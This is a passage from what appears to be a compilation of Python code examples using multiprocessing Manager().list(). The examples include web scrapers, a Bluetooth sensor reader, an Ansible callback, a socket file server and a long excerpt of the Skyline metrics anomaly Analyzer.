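    results = runner.run(range(8), n_jobs=2)
    print(results)   # eight dicts, one per input item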
Example No. 25
def amazon_scrape_to_df_multithreading(keyword):
    """
    Function:
    ---------

        (1) amazon_scrape_to_df_multithreading calls the amazon_df_one_asin, and iterates through all available ASINs, returning a Pandas DataFrame

        (2) Output DataFrame is also saved as a pickle file, for caching purposes.

        (3) WITH MULTIPROCESSING

    Args:
    -----
        (1) keyword (str): Search term defined by the user

    Returns:
    --------
        output_df (pandas DataFrame): pandas DataFrame with the following columns:
            (a) Name
            
            (b) Rating
            
            (c) User Comment
            
            (d) Date
            
            (e) Brand
            
            (f) Usefulness
            
            (g) Source
    """
    # Fake User Agent library is used, so that the User Agent is randomized, so as to be able to circumvent IP bans.
    # It will make the code run slightly slower, but we are able to yield better results.
    ua = UserAgent(cache=False, verify_ssl=False)

    list_of_asin = amazon_get_asin(keyword, ua.random)

    print("{} products found... ".format(str(len(list_of_asin))))
    list_of_asin_and_ua = [(asin, ua.random) for asin in list_of_asin]

    output_df = Manager().list()

    with Pool(processes=cpu_count() * 2) as pool:
        review_df = pool.starmap(amazon_df_one_asin, list_of_asin_and_ua)

    output_df.extend(review_df)
    pool.terminate()
    pool.join()

    output_df = pd.concat(list(output_df), ignore_index=True)

    with open('pickle_files/amazon_web_scrape.pickle', 'wb') as handle:
        pickle.dump(output_df, handle, protocol=pickle.HIGHEST_PROTOCOL)
    return output_df
Example No. 26
    def _get_ruuvitag_datas(macs=[], search_duratio_sec=None, run_flag=RunFlag(), bt_device=''):
        """
        Get data from BluetoothCommunication and handle data encoding.

        Args:
            macs (list): MAC addresses. Default empty list
            search_duratio_sec (int): Search duration in seconds. Default None
            run_flag (object): RunFlag object. Function executes while run_flag.running.
                               Default new RunFlag
            bt_device (string): Bluetooth device id
        Yields:
            tuple: MAC and State of RuuviTag sensor data
        """

        mac_blacklist = Manager().list()
        start_time = time.time()
        data_iter = ble.get_datas(mac_blacklist, bt_device)

        for ble_data in data_iter:
            # Check duration
            if search_duratio_sec and time.time() - start_time > search_duratio_sec:
                data_iter.send(StopIteration)
                break
            # Check running flag
            if not run_flag.running:
                data_iter.send(StopIteration)
                break
            # Check MAC whitelist
            if macs and not ble_data[0] in macs:
                continue
            (data_format, data) = DataFormats.convert_data(ble_data[1])
            # Check that encoded data is valid RuuviTag data and it is sensor data
            # If data is not valid RuuviTag data add MAC to blacklist
            if data is not None:
                state = get_decoder(data_format).decode_data(data)
                if state is not None:
                    yield (ble_data[0], state)
                else:
                    log.error('Decoded data is null. MAC: %s - Raw: %s', ble_data[0], ble_data[1])
            else:
                mac_blacklist.append(ble_data[0])
Example No. 27
class JobManager(threading.Thread):
    def __init__(self, num_workers, worker_name):
        threading.Thread.__init__(self, name=worker_name)

        self.pool = Pool(num_workers=num_workers, name=worker_name)

        if os.name == 'nt':
            self.in_progress_jobs = []
            self.lock = threading.RLock()
        else:
            self.in_progress_jobs = Manager().list()
            self.lock = Manager().Lock()

    def run(self):
        while 1:
            try:
                time.sleep(20)
                self.dispatch()
            except Exception:
                # Print to debug console instead of to DB.
                import traceback
                print(traceback.format_exc())

    def dispatch(self):
        raise NotImplementedError("Children must override dispatch()")

    def submit_job(self, work_unit):
        with self.lock:
            if work_unit.get_unique_key() in self.in_progress_jobs:
                return False

            self.in_progress_jobs.append(work_unit.get_unique_key())

        # Remember these shared memory references
        work_unit.in_progress_jobs = self.in_progress_jobs
        work_unit.lock = self.lock

        self.pool.submit(work_unit)

        return True
Example No. 28
class CallbackModule(object):
    def __init__(self):
        self.job_id = os.environ['MY_JOB_ID']
        self.result_list = Manager().list()

    def playbook_on_start(self):
        pass

    def runner_on_failed(self, host, res, ignore_errors=False):
        self.result_list.append({
            "host": host,
            "res": res,
            "status": "failures"
        })

    def runner_on_ok(self, host, res):
        self.result_list.append({"host": host, "res": res, "status": "ok"})

    def runner_on_skipped(self, host, item=None):
        self.result_list.append({"host": host, "res": '', "status": "skipped"})

    def runner_on_unreachable(self, host, res):
        self.result_list.append({
            "host": host,
            "res": res,
            "status": "unreachable"
        })

    def playbook_on_stats(self, stats):
        """Complete: Flush log to database"""
        hosts = stats.processed.keys()
        summary = {}

        for h in hosts:
            t = stats.summarize(h)
            summary[h] = t

        task_summary = defaultdict(lambda: defaultdict(list))
        for task_execute_item in self.result_list:
            host = task_execute_item["host"]
            status = task_execute_item["status"]
            res = task_execute_item["res"]
            task_summary[host][status].append(res)

        result = {"summary": summary, "task_summary": task_summary}
        print(json.dumps(result,
                         sort_keys=True,
                         indent=4,
                         separators=(',', ': ')))
Example No. 29
 def run(self):
     if len(self.__href_d) == 0:
         return []
     pool_size = min(cpu_count() * 4, len(self.__href_d))
     result_list = Manager().list()
     pool = Pool(pool_size)
     for district in self.__href_d:
         url = urljoin(self.url, self.__href_d[district])
         pool.apply_async(thread,
                          args=(district, url, result_list),
                          error_callback=lambda e: println(e))
     pool.close()
     pool.join()
     result = self.__city_data
     result_list.append(result)
     df = pd.DataFrame(result_list)
     df.columns = [
         "省", "市", "区", "住宅:二手房:价格", "住宅:二手房:环比", '住宅+新楼盘+价格', '住宅+新楼盘+环比',
         "住宅:出租:价格", "住宅:出租:环比", "商铺:二手房:价格", "商铺:二手房:环比", "商铺:出租:价格",
         "商铺:出租:环比", "办公:二手房:价格", "办公:二手房:环比", "办公:出租:价格", "办公:出租:环比"
     ]
     return result_list
Example No. 30
class ParserWorld:
    def __init__(self, conf: dict):
        self.url = conf['url']
        self.currency = conf['currency']
        self.table = 'index'
        self.items = Manager().list()

    def parse(self, curr):
        symbol, name = curr.split()
        params = {"symbol": symbol}
        response = requests.get(self.url, params).text
        bs = BeautifulSoup(response, "html.parser")

        rows = bs.find('table', id='dayTable').find('tbody')
        price = rows.find('span').text
        status = add_status(
            rows.find('tr').attrs['class'][0],
            rows.find('span', class_='point_status').text, "point_dn")

        item = dict(name=name,
                    date=convert_datetime_string(rows.find('td').text),
                    price=price.replace(",", ""),
                    status=status,
                    rate=calculate_ratio(status, price.replace(",", "")))
        self.items.append(item)

    def get_items(self) -> List[dict]:
        procs = []
        for _index, curr in enumerate(self.currency):
            proc = Process(target=self.parse, args=(curr, ))
            procs.append(proc)
            proc.start()

        for proc in procs:
            proc.join()

        return self.items
Example No. 31
class JobProcess(multiprocessing.Process):
    def __init__(self, thread_count, url, extime):
        multiprocessing.Process.__init__(self)
        self.thread_count = thread_count
        self.url = url
        if extime < 0:
            extime = 0
        self.extime = extime
        """这里用于产生一个共享变量List否则两个变量始终是0"""
        self.success = Manager().list()
        self.failure = Manager().list()

    def run(self):

        time.sleep(self.extime)

        works = []

        for i in range(self.thread_count):
            """这里的args非常的恶心传参(url)则会报错(url,)这样才会成功"""
            works.append(WorkThread(self.url))

        for w in works:
            w.start()
            w.join()
            if w.get_result():
                self.success.append(w.get_result())
            else:
                self.failure.append(w.get_result())
        pass

    def get_success_count(self):
        return len(self.success)

    def get_failure_count(self):
        return len(self.failure)
Example No. 32
def single_process(single_ip, single_port):
    server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_sock.bind((single_ip, single_port))
    server_sock.listen(1024)
    print(f'Serving on {single_ip,str(single_port)}')

    cli_list = Manager().list()
    path_list = Manager().list()
    cli_list_list = Manager().list()

    p = Process(target=single_process_server, args=(
        cli_list,
        path_list,
    ))
    p2 = Process(target=sp_show_list, args=(cli_list_list, ))
    p.start()
    p2.start()

    while True:
        cli_sock, cli_addr = server_sock.accept()
        data = ""
        flag = 0
        while True:
            recv_data = cli_sock.recv(1024).decode("utf-8")
            if "\r\n" in recv_data:
                data += recv_data
                break
            elif recv_data == "":
                flag = 1
                break
            else:
                data += recv_data

        if flag == 1:
            cli_sock.close()
            continue
        data = data[:-2]

        print(f"Received {data!r} from {cli_addr!r}")

        if data == "list":
            cli_list_list.append(cli_sock)
        else:
            file_path = data
            cli_list.append(cli_sock)
            path_list.append(file_path)
Example No. 33
class Analyzer(Thread):
    """
    The Analyzer class which controls the analyzer thread and spawned processes.
    """

    def __init__(self, parent_pid):
        """
        Initialize the Analyzer

        Create the :obj:`self.anomalous_metrics` list

        Create the :obj:`self.exceptions_q` queue

        Create the :obj:`self.anomaly_breakdown_q` queue

        """
        super(Analyzer, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.anomalous_metrics = Manager().list()
        self.exceptions_q = Queue()
        self.anomaly_breakdown_q = Queue()
        self.mirage_metrics = Manager().list()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def spin_process(self, i, unique_metrics):
        """
        Assign a bunch of metrics for a process to analyze.

        Multi-get the assigned_metrics for the process from Redis.

        For each metric:

        - unpack the `raw_timeseries` for the metric.
        - Analyse each timeseries against `ALGORITHMS` to determine if it is
          anomalous.
        - If anomalous add it to the :obj:`self.anomalous_metrics` list
        - Add what algorithms triggered to the :obj:`self.anomaly_breakdown_q`
          queue
        - If :mod:`settings.ENABLE_CRUCIBLE` is ``True``:

          - Add a crucible data file with the details about the timeseries and
            anomaly.
          - Write the timeseries to a json file for crucible.

        Add keys and values to the queue so the parent process can collate for:\n
        * :py:obj:`self.anomaly_breakdown_q`
        * :py:obj:`self.exceptions_q`
        """

        spin_start = time()
        logger.info('spin_process started')

        # Discover assigned metrics
        keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES)))
        if i == settings.ANALYZER_PROCESSES:
            assigned_max = len(unique_metrics)
        else:
            assigned_max = min(len(unique_metrics), i * keys_per_processor)
        # Fix analyzer worker metric assignment #94
        # https://github.com/etsy/skyline/pull/94 @languitar:worker-fix
        assigned_min = (i - 1) * keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)

        # Compile assigned metrics
        assigned_metrics = [unique_metrics[index] for index in assigned_keys]

        # Check if this process is unnecessary
        if len(assigned_metrics) == 0:
            return

        # Multi get series
        raw_assigned = self.redis_conn.mget(assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Distill timeseries strings into lists
        for i, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                raw_series = raw_assigned[i]
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_name)

                # If it's anomalous, add it to list
                if anomalous:
                    base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
                    metric = [datapoint, base_name]
                    self.anomalous_metrics.append(metric)

                    # Get the anomaly breakdown - who returned True?
                    triggered_algorithms = []
                    for index, value in enumerate(ensemble):
                        if value:
                            algorithm = settings.ALGORITHMS[index]
                            anomaly_breakdown[algorithm] += 1
                            triggered_algorithms.append(algorithm)

                    # If Crucible or Panorama are enabled determine details
                    determine_anomaly_details = False
                    if settings.ENABLE_CRUCIBLE and settings.ANALYZER_CRUCIBLE_ENABLED:
                        determine_anomaly_details = True
                    if settings.PANORAMA_ENABLED:
                        determine_anomaly_details = True

                    if determine_anomaly_details:
                        metric_timestamp = str(int(timeseries[-1][0]))
                        from_timestamp = str(int(timeseries[1][0]))
                        timeseries_dir = base_name.replace('.', '/')

                    # If Panorama is enabled - create a Panorama check
                    if settings.PANORAMA_ENABLED:
                        if not os.path.exists(settings.PANORAMA_CHECK_PATH):
                            if python_version == 2:
                                mode_arg = int('0755')
                            if python_version == 3:
                                mode_arg = mode=0o755
                            os.makedirs(settings.PANORAMA_CHECK_PATH, mode_arg)

                        # Note:
                        # The values are intentionally enclosed in single quotes
                        # as the imp.load_source used results in a shift in the
                        # decimal position when double quoted, e.g.
                        # value = "5622.0" gets imported as
                        # 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
                        # single quoting results in the desired,
                        # 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
                        added_at = str(int(time()))
                        source = 'graphite'
                        panaroma_anomaly_data = 'metric = \'%s\'\n' \
                                                'value = \'%s\'\n' \
                                                'from_timestamp = \'%s\'\n' \
                                                'metric_timestamp = \'%s\'\n' \
                                                'algorithms = %s\n' \
                                                'triggered_algorithms = %s\n' \
                                                'app = \'%s\'\n' \
                                                'source = \'%s\'\n' \
                                                'added_by = \'%s\'\n' \
                                                'added_at = \'%s\'\n' \
                            % (base_name, str(datapoint), from_timestamp,
                               metric_timestamp, str(settings.ALGORITHMS),
                               triggered_algorithms, skyline_app, source,
                               this_host, added_at)

                        # Create an anomaly file with details about the anomaly
                        panaroma_anomaly_file = '%s/%s.%s.txt' % (
                            settings.PANORAMA_CHECK_PATH, added_at,
                            base_name)
                        try:
                            write_data_to_file(
                                skyline_app, panaroma_anomaly_file, 'w',
                                panaroma_anomaly_data)
                            logger.info('added panorama anomaly file :: %s' % (panaroma_anomaly_file))
                        except:
                            logger.error('error :: failed to add panorama anomaly file :: %s' % (panaroma_anomaly_file))
                            logger.info(traceback.format_exc())

                    # If Crucible is enabled - save timeseries and create a
                    # Crucible check
                    if settings.ENABLE_CRUCIBLE and settings.ANALYZER_CRUCIBLE_ENABLED:
                        crucible_anomaly_dir = settings.CRUCIBLE_DATA_FOLDER + '/' + timeseries_dir + '/' + metric_timestamp
                        if not os.path.exists(crucible_anomaly_dir):
                            if python_version == 2:
                                mode_arg = int('0755', 8)
                            if python_version == 3:
                                mode_arg = 0o755
                            os.makedirs(crucible_anomaly_dir, mode_arg)

                        # Note:
                        # The values are intentionally enclosed in single
                        # quotes, as the imp.load_source used in crucible
                        # results in a shift in the decimal position when they
                        # are double quoted, e.g.
                        # value = "5622.0" gets imported as
                        # 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
                        # single quoting results in the desired,
                        # 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0

                        crucible_anomaly_data = 'metric = \'%s\'\n' \
                                                'value = \'%s\'\n' \
                                                'from_timestamp = \'%s\'\n' \
                                                'metric_timestamp = \'%s\'\n' \
                                                'algorithms = %s\n' \
                                                'triggered_algorithms = %s\n' \
                                                'anomaly_dir = \'%s\'\n' \
                                                'graphite_metric = True\n' \
                                                'run_crucible_tests = False\n' \
                                                'added_by = \'%s\'\n' \
                                                'added_at = \'%s\'\n' \
                            % (base_name, str(datapoint), from_timestamp,
                               metric_timestamp, str(settings.ALGORITHMS),
                               triggered_algorithms, crucible_anomaly_dir,
                               skyline_app, metric_timestamp)

                        # Create an anomaly file with details about the anomaly
                        crucible_anomaly_file = '%s/%s.txt' % (crucible_anomaly_dir, base_name)
                        try:
                            write_data_to_file(
                                skyline_app, crucible_anomaly_file, 'w',
                                crucible_anomaly_data)
                            logger.info('added crucible anomaly file :: %s' % (crucible_anomaly_file))
                        except:
                            logger.error('error :: failed to add crucible anomaly file :: %s' % (crucible_anomaly_file))
                            logger.info(traceback.format_exc())

                        # Create timeseries json file with the timeseries
                        json_file = '%s/%s.json' % (crucible_anomaly_dir, base_name)
                        timeseries_json = str(timeseries).replace('[', '(').replace(']', ')')
                        try:
                            write_data_to_file(skyline_app, json_file, 'w', timeseries_json)
                            logger.info('added crucible timeseries file :: %s' % (json_file))
                        except:
                            logger.error('error :: failed to add crucible timeseries file :: %s' % (json_file))
                            logger.info(traceback.format_exc())

                        # Create a crucible check file
                        crucible_check_file = '%s/%s.%s.txt' % (settings.CRUCIBLE_CHECK_PATH, metric_timestamp, base_name)
                        try:
                            write_data_to_file(
                                skyline_app, crucible_check_file, 'w',
                                crucible_anomaly_data)
                            logger.info('added crucible check :: %s,%s' % (base_name, metric_timestamp))
                        except:
                            logger.error('error :: failed to add crucible check file :: %s' % (crucible_check_file))
                            logger.info(traceback.format_exc())

            # It could have been deleted by the Roomba
            except TypeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except:
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # Add values to the queue so the parent process can collate
        for key, value in anomaly_breakdown.items():
            self.anomaly_breakdown_q.put((key, value))

        for key, value in exceptions.items():
            self.exceptions_q.put((key, value))

        spin_end = time() - spin_start
        logger.info('spin_process took %.2f seconds' % spin_end)

    def run(self):
        """
        - Called when the process initializes.

        - Determine if Redis is up and discover the number of `unique metrics`.

        - Divide the `unique_metrics` between the number of `ANALYZER_PROCESSES`
          and assign each process a set of metrics to analyse for anomalies.

        - Wait for the processes to finish.

        - Determine whether any anomalous metrics require:

            - Alerting on (and setting the `EXPIRATION_TIME` key in Redis for the alert).
            - Feeding to another module, e.g. mirage.
            - Alerting to syslog.

        - Populate the webapp json with the anomalous_metrics details.

        - Log the details about the run to the skyline analyzer log.

        - Send skyline.analyzer metrics to `GRAPHITE_HOST`
        """

        # Log management to prevent overwriting
        # Allow the bin/<skyline_app>.d to manage the log
        if os.path.isfile(skyline_app_logwait):
            try:
                os.remove(skyline_app_logwait)
            except OSError:
                logger.error('error - failed to remove %s, continuing' % skyline_app_logwait)
                pass

        now = time()
        log_wait_for = now + 5
        while now < log_wait_for:
            if os.path.isfile(skyline_app_loglock):
                sleep(.1)
                now = time()
            else:
                now = log_wait_for + 1

        logger.info('starting %s run' % skyline_app)
        if os.path.isfile(skyline_app_loglock):
            logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app)
            try:
                os.remove(skyline_app_loglock)
                logger.info('log lock file removed')
            except OSError:
                logger.error('error - failed to remove %s, continuing' % skyline_app_loglock)
                pass
        else:
            logger.info('bin/%s.d log management done' % skyline_app)

        if not os.path.exists(settings.SKYLINE_TMP_DIR):
            if python_version == 2:
                mode_arg = int('0755', 8)
            if python_version == 3:
                mode_arg = 0o755
            os.makedirs(settings.SKYLINE_TMP_DIR, mode_arg)

        # Initiate the algorithm timings if Analyzer is configured to send the
        # algorithm_breakdown metrics with ENABLE_ALGORITHM_RUN_METRICS
        algorithm_tmp_file_prefix = settings.SKYLINE_TMP_DIR + '/' + skyline_app + '.'
        algorithms_to_time = []
        if send_algorithm_run_metrics:
            algorithms_to_time = settings.ALGORITHMS

        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except:
                logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
                continue

            # Report app up
            self.redis_conn.setex(skyline_app, 120, now)

            # Discover unique metrics
            unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))

            if len(unique_metrics) == 0:
                logger.info('no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Using count files rather than multiprocessing.Value to enable
            # metrics for algorithm run times, etc
            for algorithm in algorithms_to_time:
                algorithm_count_file = algorithm_tmp_file_prefix + algorithm + '.count'
                algorithm_timings_file = algorithm_tmp_file_prefix + algorithm + '.timings'
                # with open(algorithm_count_file, 'a') as f:
                with open(algorithm_count_file, 'w') as f:
                    pass
                with open(algorithm_timings_file, 'w') as f:
                    pass

            # Remove any existing algorithm.error files from any previous runs
            # that did not cleanup for any reason
            pattern = '%s.*.algorithm.error' % skyline_app
            try:
                for f in os.listdir(settings.SKYLINE_TMP_DIR):
                    if re.search(pattern, f):
                        try:
                            os.remove(os.path.join(settings.SKYLINE_TMP_DIR, f))
                            logger.info('cleaning up old error file - %s' % (str(f)))
                        except OSError:
                            pass
            except:
                logger.error('failed to cleanup algorithm.error files ' + traceback.format_exc())

            # Spawn processes
            pids = []
            spawned_pids = []
            pid_count = 0
            for i in range(1, settings.ANALYZER_PROCESSES + 1):
                if i > len(unique_metrics):
                    logger.info('WARNING: skyline is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, unique_metrics))
                pids.append(p)
                pid_count += 1
                logger.info('starting %s of %s spin_process/es' % (str(pid_count), str(settings.ANALYZER_PROCESSES)))
                p.start()
                spawned_pids.append(p.pid)

            # Send wait signal to zombie processes
            # for p in pids:
            #     p.join()
            # Self monitor processes and terminate if any spin_process has run
            # for longer than 180 seconds - 20160512 @earthgecko
            p_starts = time()
            while time() - p_starts <= settings.MAX_ANALYZER_PROCESS_RUNTIME:
                if any(p.is_alive() for p in pids):
                    # Just to avoid hogging the CPU
                    sleep(.1)
                else:
                    # All the processes are done, break now.
                    time_to_run = time() - p_starts
                    logger.info('%s :: %s spin_process/es completed in %.2f seconds' % (skyline_app, str(settings.ANALYZER_PROCESSES), time_to_run))
                    break
            else:
                # We only enter this if we didn't 'break' above.
                logger.info('%s :: timed out, killing all spin_process processes' % (skyline_app))
                for p in pids:
                    p.terminate()
                    p.join()

            # Log the last reported error by any algorithms that errored in the
            # spawned processes from algorithms.py
            for completed_pid in spawned_pids:
                logger.info('spin_process with pid %s completed' % (str(completed_pid)))
                for algorithm in settings.ALGORITHMS:
                    algorithm_error_file = '%s/%s.%s.%s.algorithm.error' % (
                        settings.SKYLINE_TMP_DIR, skyline_app,
                        str(completed_pid), algorithm)
                    if os.path.isfile(algorithm_error_file):
                        logger.info(
                            'error - spin_process with pid %s has reported an error with the %s algorithm' % (
                                str(completed_pid), algorithm))
                        try:
                            with open(algorithm_error_file, 'r') as f:
                                error_string = f.read()
                            logger.error('%s' % str(error_string))
                        except:
                            logger.error('failed to read %s error file' % algorithm)
                        try:
                            os.remove(algorithm_error_file)
                        except OSError:
                            pass

            # Grab data from the queue and populate dictionaries
            exceptions = dict()
            anomaly_breakdown = dict()
            while 1:
                try:
                    key, value = self.anomaly_breakdown_q.get_nowait()
                    if key not in anomaly_breakdown.keys():
                        anomaly_breakdown[key] = value
                    else:
                        anomaly_breakdown[key] += value
                except Empty:
                    break

            while 1:
                try:
                    key, value = self.exceptions_q.get_nowait()
                    if key not in exceptions.keys():
                        exceptions[key] = value
                    else:
                        exceptions[key] += value
                except Empty:
                    break

            # Send alerts
            if settings.ENABLE_ALERTS:
                for alert in settings.ALERTS:
                    for metric in self.anomalous_metrics:
                        ALERT_MATCH_PATTERN = alert[0]
                        METRIC_PATTERN = metric[1]
                        alert_match_pattern = re.compile(ALERT_MATCH_PATTERN)
                        pattern_match = alert_match_pattern.match(METRIC_PATTERN)
                        if pattern_match:
                            cache_key = 'last_alert.%s.%s' % (alert[1], metric[1])
                            try:
                                last_alert = self.redis_conn.get(cache_key)
                                if not last_alert:
                                    try:
                                        SECOND_ORDER_RESOLUTION_FULL_DURATION = alert[3]
                                        logger.info('mirage check      :: %s' % (metric[1]))
                                        # Write anomalous metric to test at second
                                        # order resolution by crucible to the check
                                        # file
                                        metric_timestamp = int(time())
                                        anomaly_check_file = '%s/%s.%s.txt' % (settings.MIRAGE_CHECK_PATH, metric_timestamp, metric[1])
                                        with open(anomaly_check_file, 'w') as fh:
                                            # metric_name, anomalous datapoint, hours to resolve, timestamp
                                            fh.write('metric = "%s"\nvalue = "%s"\nhours_to_resolve = "%s"\nmetric_timestamp = "%s"\n' % (metric[1], metric[0], alert[3], metric_timestamp))
                                        if python_version == 2:
                                            mode_arg = int('0644', 8)
                                        if python_version == 3:
                                            mode_arg = 0o644
                                        os.chmod(anomaly_check_file, mode_arg)

                                        logger.info('added mirage check :: %s,%s,%s' % (metric[1], metric[0], alert[3]))
                                        # Add to the mirage_metrics list
                                        base_name = METRIC_PATTERN.replace(settings.FULL_NAMESPACE, '', 1)
                                        metric = [metric[0], base_name]
                                        self.mirage_metrics.append(metric)
                                        # Alert for analyzer if enabled
                                        if settings.ENABLE_FULL_DURATION_ALERTS:
                                            self.redis_conn.setex(cache_key, alert[2], packb(metric[0]))
                                            trigger_alert(alert, metric)
                                    except:
                                        self.redis_conn.setex(cache_key, alert[2], packb(metric[0]))
                                        trigger_alert(alert, metric)
                            except Exception as e:
                                logger.error('error :: could not send alert: %s' % e)

            # Push to crucible
#            if len(self.crucible_anomalous_metrics) > 0:
#                logger.info('to do - push to crucible')

            # Write anomalous_metrics to static webapp directory
            if len(self.anomalous_metrics) > 0:
                filename = path.abspath(path.join(path.dirname(__file__), '..', settings.ANOMALY_DUMP))
                with open(filename, 'w') as fh:
                    # Make it JSONP with a handle_data() function
                    anomalous_metrics = list(self.anomalous_metrics)
                    anomalous_metrics.sort(key=operator.itemgetter(1))
                    fh.write('handle_data(%s)' % anomalous_metrics)

            # Using count files rather than multiprocessing.Value to enable
            # metrics for algorithm run times, etc
            for algorithm in algorithms_to_time:
                algorithm_count_file = algorithm_tmp_file_prefix + algorithm + '.count'
                algorithm_timings_file = algorithm_tmp_file_prefix + algorithm + '.timings'

                try:
                    algorithm_count_array = []
                    with open(algorithm_count_file, 'r') as f:
                        for line in f:
                            value_string = line.replace('\n', '')
                            unquoted_value_string = value_string.replace("'", '')
                            float_value = float(unquoted_value_string)
                            algorithm_count_array.append(float_value)
                except:
                    algorithm_count_array = False

                if not algorithm_count_array:
                    continue

                number_of_times_algorithm_run = len(algorithm_count_array)
                logger.info(
                    'algorithm run count - %s run %s times' % (
                        algorithm, str(number_of_times_algorithm_run)))
                if number_of_times_algorithm_run == 0:
                    continue

                try:
                    algorithm_timings_array = []
                    with open(algorithm_timings_file, 'r') as f:
                        for line in f:
                            value_string = line.replace('\n', '')
                            unquoted_value_string = value_string.replace("'", '')
                            float_value = float(unquoted_value_string)
                            algorithm_timings_array.append(float_value)
                except:
                    algorithm_timings_array = False

                if not algorithm_timings_array:
                    continue

                number_of_algorithm_timings = len(algorithm_timings_array)
                logger.info(
                    'algorithm timings count - %s has %s timings' % (
                        algorithm, str(number_of_algorithm_timings)))

                if number_of_algorithm_timings == 0:
                    continue

                try:
                    _sum_of_algorithm_timings = sum(algorithm_timings_array)
                except:
                    logger.error("sum error: " + traceback.format_exc())
                    _sum_of_algorithm_timings = round(0.0, 6)
                    logger.error('error - sum_of_algorithm_timings - %s' % (algorithm))
                    continue

                sum_of_algorithm_timings = round(_sum_of_algorithm_timings, 6)
                # logger.info('sum_of_algorithm_timings - %s - %.16f seconds' % (algorithm, sum_of_algorithm_timings))

                try:
                    _median_algorithm_timing = determine_median(algorithm_timings_array)
                except:
                    _median_algorithm_timing = round(0.0, 6)
                    logger.error('error - _median_algorithm_timing - %s' % (algorithm))
                    continue
                median_algorithm_timing = round(_median_algorithm_timing, 6)
                # logger.info('median_algorithm_timing - %s - %.16f seconds' % (algorithm, median_algorithm_timing))

                logger.info(
                    'algorithm timing - %s - total: %.6f - median: %.6f' % (
                        algorithm, sum_of_algorithm_timings,
                        median_algorithm_timing))
                use_namespace = skyline_app_graphite_namespace + '.algorithm_breakdown.' + algorithm
                send_metric_name = use_namespace + '.timing.times_run'
                send_graphite_metric(skyline_app, send_metric_name, str(number_of_algorithm_timings))
                send_metric_name = use_namespace + '.timing.total_time'
                send_graphite_metric(skyline_app, send_metric_name, str(sum_of_algorithm_timings))
                send_metric_name = use_namespace + '.timing.median_time'
                send_graphite_metric(skyline_app, send_metric_name, str(median_algorithm_timing))

            run_time = time() - now
            total_metrics = str(len(unique_metrics))
            total_analyzed = str(len(unique_metrics) - sum(exceptions.values()))
            total_anomalies = str(len(self.anomalous_metrics))

            # Log progress
            logger.info('seconds to run    :: %.2f' % run_time)
            logger.info('total metrics     :: %s' % total_metrics)
            logger.info('total analyzed    :: %s' % total_analyzed)
            logger.info('total anomalies   :: %s' % total_anomalies)
            logger.info('exception stats   :: %s' % exceptions)
            logger.info('anomaly breakdown :: %s' % anomaly_breakdown)

            # Log to Graphite
            graphite_run_time = '%.2f' % run_time
            send_metric_name = skyline_app_graphite_namespace + '.run_time'
            send_graphite_metric(skyline_app, send_metric_name, graphite_run_time)

            send_metric_name = skyline_app_graphite_namespace + '.total_analyzed'
            send_graphite_metric(skyline_app, send_metric_name, total_analyzed)

            send_metric_name = skyline_app_graphite_namespace + '.total_anomalies'
            send_graphite_metric(skyline_app, send_metric_name, total_anomalies)

            send_metric_name = skyline_app_graphite_namespace + '.total_metrics'
            send_graphite_metric(skyline_app, send_metric_name, total_metrics)
            for key, value in exceptions.items():
                send_metric_name = '%s.exceptions.%s' % (skyline_app_graphite_namespace, key)
                send_graphite_metric(skyline_app, send_metric_name, str(value))
            for key, value in anomaly_breakdown.items():
                send_metric_name = '%s.anomaly_breakdown.%s' % (skyline_app_graphite_namespace, key)
                send_graphite_metric(skyline_app, send_metric_name, str(value))

            # Check canary metric
            raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
                time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600
                projected = 24 * (time() - now) / time_human

                logger.info('canary duration   :: %.2f' % time_human)
                send_metric_name = skyline_app_graphite_namespace + '.duration'
                send_graphite_metric(skyline_app, send_metric_name, str(time_human))

                send_metric_name = skyline_app_graphite_namespace + '.projected'
                send_graphite_metric(skyline_app, send_metric_name, str(projected))
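                # Worked example (hypothetical numbers): if the canary
                # timeseries spans 86400 seconds then time_human is 24.0
                # (hours), and a 12 second run gives
                # projected = 24 * 12 / 24.0 = 12.0, i.e. the run time
                # normalised to a full 24 hours of data.  A shorter 6 hour
                # canary series with the same 12 second run would project
                # 24 * 12 / 6.0 = 48.0 seconds.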

            # Reset counters
            self.anomalous_metrics[:] = []

            # Sleep if it went too fast
            # if time() - now < 5:
            #    logger.info('sleeping due to low run time...')
            #    sleep(10)
            # @modified 20160504 - @earthgecko - development internal ref #1338, #1340
            # Etsy's original for this was a value of 5 seconds, which does
            # not make the skyline Analyzer very efficient in installations
            # where 100s of 1000s of metrics are being analyzed.  It led to
